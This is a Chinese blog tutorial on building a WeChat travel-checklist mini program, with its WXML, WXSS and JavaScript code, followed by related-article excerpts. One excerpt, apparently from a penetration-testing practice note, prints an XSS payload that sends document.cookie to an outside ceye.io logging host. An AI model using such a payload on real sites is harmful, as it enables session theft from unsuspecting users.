前面的博文中。我们陆续学习与开发了记账等一些实用实用小程序的开发过程,今天来打造一个适合出行场景的工具 ——“旅行清单小程序”。无论是短途游玩还是长途旅行,它都能帮你梳理需要携带的物品,避免遗漏。下面就跟着步骤,一步步实现这个小程序。再次体验开发者的快乐

一、开发小程序员前的准备工作​🌷🌷

1. 工具检查​🌷🌷

          确保微信开发者工具已安装并更新到最新版本。若未安装,打开微信公众平台(微信公众平台),在页面底部找到 “下载” 选项,根据电脑系统选择对应的安装包进行安装。已安装的用户,打开工具后留意是否有更新提示,及时更新以保障开发顺利。​

2. 账号准备​

             若仅用于个人学习,无需上线,创建项目时选择 “体验模式” 即可。若有上线计划,需在微信公众平台注册小程序账号,注册完成后在 “设置 - 开发设置” 中获取 AppID,创建项目时填入。​

二、创建旅行清单小程序项目​🌷🌷

                 打开微信开发者工具,点击 “新建项目”。在弹出的窗口中,填写项目名称,比如 “我的旅行清单”,选择合适的项目存放目录。有 AppID 则填入,没有则勾选 “不使用云服务” 并选择 “体验模式”,点击 “新建”,项目框架就搭建好了。​

              项目创建后,熟悉一下目录结构。pages文件夹用于存放各页面代码;app.js是小程序的逻辑入口;app.json负责配置页面路径、窗口样式等;app.wxss用于设置全局样式,这些文件在开发中会频繁用到。​

三、构建旅行清单小程序页面​🌷🌷

这个旅行清单小程序主要有一个页面,能实现添加物品、标记物品是否已携带、删除物品以及清空清单等功能。​

1. 创建页面文件​

       在pages文件夹上右键,选择 “新建 Page”,命名为travelList,系统会自动生成travelList.js、travelList.json、travelList.wxml、travelList.wxss四个文件,分别对应页面的逻辑、配置、结构和样式。​

2. 编写小程序的页面结构

<view class="container"><view class="add-section"><input placeholder="请输入要携带的物品" bindinput="inputItem"></input><button bindtap="addItem">添加</button></view><view class="list-section" wx:if="{{itemList.length > 0}}"><view class="list-item" wx:for="{{itemList}}" wx:key="index"><checkbox checked="{{item.checked}}" bindchange="toggleCheck" data-index="{{index}}"></checkbox><text class="{{item.checked ? 'checked-text' : ''}}">{{item.name}}</text><button bindtap="deleteItem" data-index="{{index}}" size="mini">删除</button></view><button bindtap="clearList" class="clear-btn">清空清单</button></view><view class="empty-tip" wx:if="{{itemList.length === 0}}">清单为空,添加你的旅行物品吧~</view>
</view>

           这段代码构建了页面的基本结构。add-section包含输入框和添加按钮,用于添加物品;list-section在清单有物品时显示,里面通过循环展示物品列表,每个物品包含复选框、名称和删除按钮;clear-btn用于清空清单;empty-tip在清单为空时显示提示文字。​

3. 编写小程序的页面样式

.container {padding: 20px;
}.add-section {display: flex;gap: 10px;margin-bottom: 25px;
}.add-section input {flex: 1;height: 45px;border: 1px solid #ddd;border-radius: 6px;padding-left: 12px;
}.add-section button {width: 100px;height: 45px;background-color: #2196F3;color: white;border: none;border-radius: 6px;
}.list-item {display: flex;align-items: center;gap: 10px;padding: 12px;border: 1px solid #f0f0f0;border-radius: 6px;margin-bottom: 10px;
}.list-item checkbox {transform: scale(1.2);
}.checked-text {text-decoration: line-through;color: #999;flex: 1;
}.list-item text {flex: 1;font-size: 16px;
}.list-item button {background-color: #f44336;color: white;border: none;border-radius: 4px;
}.clear-btn {width: 100%;height: 40px;background-color: #f5f5f5;color: #666;border: none;border-radius: 6px;margin-top: 15px;
}.empty-tip {text-align: center;color: #999;padding: 30px 0;
}

               这些样式让页面布局更合理美观,设置了添加区域、物品列表、按钮等元素的样式,勾选后的物品名称会显示删除线并变灰,增强视觉区分。​

4. 编写小程序页面逻辑

Page({data: {inputValue: '',itemList: []},onLoad: function () {// 从本地存储获取清单数据const list = wx.getStorageSync('travelList');if (list) {this.setData({itemList: list});}},inputItem: function (e) {this.setData({inputValue: e.detail.value});},addItem: function () {if (!this.data.inputValue.trim()) {wx.showToast({title: '请输入物品名称',icon: 'none'});return;}const newItem = {name: this.data.inputValue.trim(),checked: false};const newList = [...this.data.itemList, newItem];this.setData({itemList: newList,inputValue: ''});// 保存到本地存储wx.setStorageSync('travelList', newList);wx.showToast({title: '添加成功',icon: 'success'});},toggleCheck: function (e) {const index = e.currentTarget.dataset.index;const newList = [...this.data.itemList];newList[index].checked =!newList[index].checked;this.setData({itemList: newList});wx.setStorageSync('travelList', newList);},deleteItem: function (e) {const index = e.currentTarget.dataset.index;const newList = [...this.data.itemList];newList.splice(index, 1);this.setData({itemList: newList});wx.setStorageSync('travelList', newList);},clearList: function () {wx.showModal({title: '提示',content: '确定要清空所有物品吗?',success: (res) => {if (res.confirm) {this.setData({itemList: []});wx.setStorageSync('travelList', []);}}});}
});

             在data中定义了输入框的值和物品列表。onLoad方法从本地存储获取清单数据;inputItem获取输入的物品名称;addItem验证输入后添加物品到清单,并更新本地存储;toggleCheck处理物品的勾选状态切换;deleteItem删除指定物品;clearList通过模态框确认后清空清单。​

四、运行与调试小程序​🌷🌷

             完成代码后,点击微信开发者工具的 “编译” 按钮,模拟器中就会显示这个旅行清单小程序。在输入框输入物品名称,点击 “添加” 按钮,物品会被加入清单;勾选复选框可标记物品已携带;点击 “删除” 可移除对应物品;点击 “清空清单” 可删除所有物品。​

          若运行出现问题,可通过右侧调试面板查看报错信息。比如在addItem方法中添加console.log(this.data.inputValue),查看是否成功获取输入的物品名称,帮助排查问题。​

             这个旅行清单小程序功能实用,涵盖了数据的增删改查和本地存储等常用操作。你还可以进一步优化,比如给物品分类、设置提醒时间等。赶紧动手试试,让你的旅行准备更有条理吧!每次的教程让你领略开发的全过程。了解微信小程序的一些基本常识。

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/bicheng/90165.shtml
繁体地址,请注明出处:http://hk.pswp.cn/bicheng/90165.shtml
英文地址,请注明出处:http://en.pswp.cn/bicheng/90165.shtml

如若内容造成侵权/违法违规/事实不符,请联系英文站点网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MySQL主从同步集群(Docker搭建)

以下笔记都是基于黑马程序员的面试题写的&#xff1a; Mysql定位慢查询-CSDN博客 Mysql索引-CSDN博客 MySQL事物相关-CSDN博客 MySQL主从同步集群&#xff08;Docker搭建&#xff09;-CSDN博客 MySQL相关面试问题总结-CSDN博客 主从同步&#xff08;Master-Slave Replicat…

NISP-PTE基础实操——XSS

pteXSS模拟1 <script> var img document.createElement("img");img.src"http://xxxxx.ceye.io/log?"escape(document.coo kie);document.body.appendChild(img); </script> 重放加Cookie头 pteXSS模拟2 <script type"text/javasc…

基于网络爬虫的在线医疗咨询数据爬取与医疗服务分析系统,技术采用django+朴素贝叶斯算法+boostrap+echart可视化

摘要 为了发挥互联网医疗问询服务平台在客观衡量医疗服务质量、进一步分析和挖掘网民评论数据方面的作用&#xff0c;本文完成了互联网医疗问询数据抓取与医疗服务质量服务分析平台的主要模块应用&#xff0c;如用户登录注册、医疗服务质量数据分析与信息可视化以及用户情绪识别…

【备忘录】Ubuntu 配置 NFS

安装 NFSsudo apt-get install nfs-kernel-server rpcbind启动 NFSsudo systemctl start nfs-server查看 NFSsudo service nfs-server status

【coze扣子】第1篇:coze快速入门

文章目录coze扣子Coze优点Coze智能体快速入门1、登录进入到个人主页2、创建智能体3、智能体组成部分4、智能体的发布人设与回复逻辑LLM模型配置模型设置生成多样性(抽象程度)Top P&#xff08;话痨程度&#xff09;重复语句惩罚携带上下文轮数最大回复长度技能插件触发器定时触…

PyCharm 入门指南:起步学习、开发环境一体

PyCharm 入门指南一、前置准备&#xff1a;为什么选择 PyCharm&#xff1f; 对于 Python 初学者&#xff0c;PyCharm 是最友好的集成开发环境&#xff08;IDE&#xff09;之一。它通过智能代码提示、自动纠错、调试工具、版本控制集成等功能&#xff0c;大幅降低开发门槛。本文…

【Java企业级开发】(六)Java框架技术-Maven和MyBatis

一、Maven 1.1 非Maven项目的缺点 问题一&#xff1a; 项目中的jar包资源需要我们自己从网上下载后&#xff0c;手动导入到项目中使用&#xff0c;不好管理 问题二&#xff1a; jar包版本控制麻烦 1.2 Maven介绍 Maven是使用Java语言编写的基于项目对象模型&#xff08;POM&am…

学习秒杀系统-页面优化技术

文章目录前言页面缓存URL缓存对象缓存页面缓存取缓存手动渲染URL缓存对象缓存页面静态化&#xff0c;前后端分离&#xff08;常用&#xff09;GET POST区别如何解决超卖&#xff1f;重复卖&#xff1f;&#xff08;简单版&#xff09;静态资源优化多个JS/CSS组合&#xff0c;减…

QCC系列显示交互层的自研技术突破与实践

在音频设备智能化进程中&#xff0c;显示交互的流畅度与兼容性已成为用户体验的核心指标。传统方案中&#xff0c;TFT 彩屏与多语言适配常面临硬件驱动冲突、功耗失控、字符显示错乱等问题。作为高通平台十年级方案商&#xff0c;腾泰技术在 QCC 系列中聚焦显示交互层的自研技术…

JMeter 实现 Protobuf 加密解密

一、 .proto文件编译成.jar文件 相关依赖下载详见&#xff1a;将 message.proto 编译成 .jar文件 1.依赖于java编译环境 2.依赖protoc编译jar包 编译目录 1.创建一个根目录&#xff1a;protobuf 2.在protobuf下创建build、output、lib、src目录 lib&#xff1a;放 protobu…

发票识别在费控系统应用剖析

一、发票识别与费控系统的融合价值1.1 解决传统费控痛点效率瓶颈突破&#xff1a;将人工处理每张发票的5-8分钟缩短至秒级自动识别准确性飞跃&#xff1a;关键字段识别准确率从人工的95%提升至99%以上合规性强化&#xff1a;自动对接税务系统验真&#xff0c;虚假发票识别率提升…

Rust实战:决策树与随机森林实现

基于 Rust 实现决策树(Decision Tree)和随机森林(Random Forest)的实例 Linfa的基本定义 Linfa是意大利语中“淋巴”(lymph)的意思,在医学领域指淋巴系统相关的结构或功能。淋巴系统由淋巴管、淋巴结、脾脏等组成,负责免疫防御和体液平衡。 Linfa在生物学中的作用 …

9. isaacsim4.2教程-ROS加相机/CLOCK

在本示例中&#xff0c;我们将学习如何&#xff1a; 向场景中添加额外的相机并将其安装在机器人上 添加相机发布器&#xff08;Camera Publishers&#xff09; 通过 rostopics 发送真实的合成感知数据&#xff08;ground truth synthetic perception data&#xff09; 前提…

微信小程序171~180

1.封装购物车接口API import http from /utils/httpexport const reqAddCrt ({ goodsId, count, ...data }) > {return http.get(/cart/addToCart/${goodsId}/${count}, data) }export const reqCartList () > {return http.get(/cart/getCartList) }export const reqU…

修改 docker 容器的挂载配置(保持数据不丢的情况)

一、核心原理Docker 容器的运行时配置&#xff08;包括挂载&#xff09;是启动时确定的&#xff0c;一旦启动无法直接修改。因此&#xff0c;需通过以下步骤实现&#xff1a;保存原容器中的数据&#xff08;避免丢失&#xff09;&#xff1b;基于原镜像创建新容器&#xff0c;同…

MVCC(多版本并发控制)介绍及实现原理

一、什么是MVCC&#xff1f; MVCC&#xff08;Multi-Version Concurrency Control&#xff0c;多版本并发控制&#xff09;是数据库中用于解决并发访问问题的一种机制。它通过为数据维护多个版本&#xff0c;让读写操作在不同版本上独立进行&#xff0c;从而避免了传统锁机制中…

密码学基础概念详解:从古典加密到现代密码体系

一、引言&#xff1a;为什么我们需要密码学&#xff1f; 在数字化时代&#xff0c;信息已成为核心生产要素&#xff0c;而信息安全则是保障社会运转的基石。当我们在电商平台输入银行卡密码时&#xff0c;当我们通过即时通讯工具发送私密消息时&#xff0c;当企业在云端存储核心…

小鹏汽车视觉算法面试30问全景精解

小鹏汽车视觉算法面试30问全景精解 ——智能驾驶 车路协同 视觉创新:小鹏汽车视觉算法面试核心考点全览 前言 小鹏汽车作为中国智能电动汽车的创新引领者,致力于通过AI与自动驾驶技术推动智能出行的变革。小鹏视觉算法团队深耕自动驾驶感知、车路协同、智能座舱、3D重建…

程序是如何生成的-以c语言为例

一&#xff0c;序言 从代码到能跑的程序&#xff0c;整个过程就像 “把外文翻译成母语&#xff0c;再组装成能直接用的东西”&#xff0c;一步步来更清楚&#xff1a; 源代码&#xff08;程序员写的代码&#xff0c;如C语言文件&#xff09;↓ 预处理&#xff08;处理#开头的命…

风险识别清单:构建动态化的风险管理体系

在项目管理实践中&#xff0c;风险识别是确保项目成功的关键环节。PMBOK提出的风险提示清单&#xff08;Prompt List&#xff09;为项目团队提供了一个系统化的思考框架&#xff0c;帮助突破个人经验局限&#xff0c;实现更全面的风险覆盖。这一工具的价值不仅在于其提供的标准…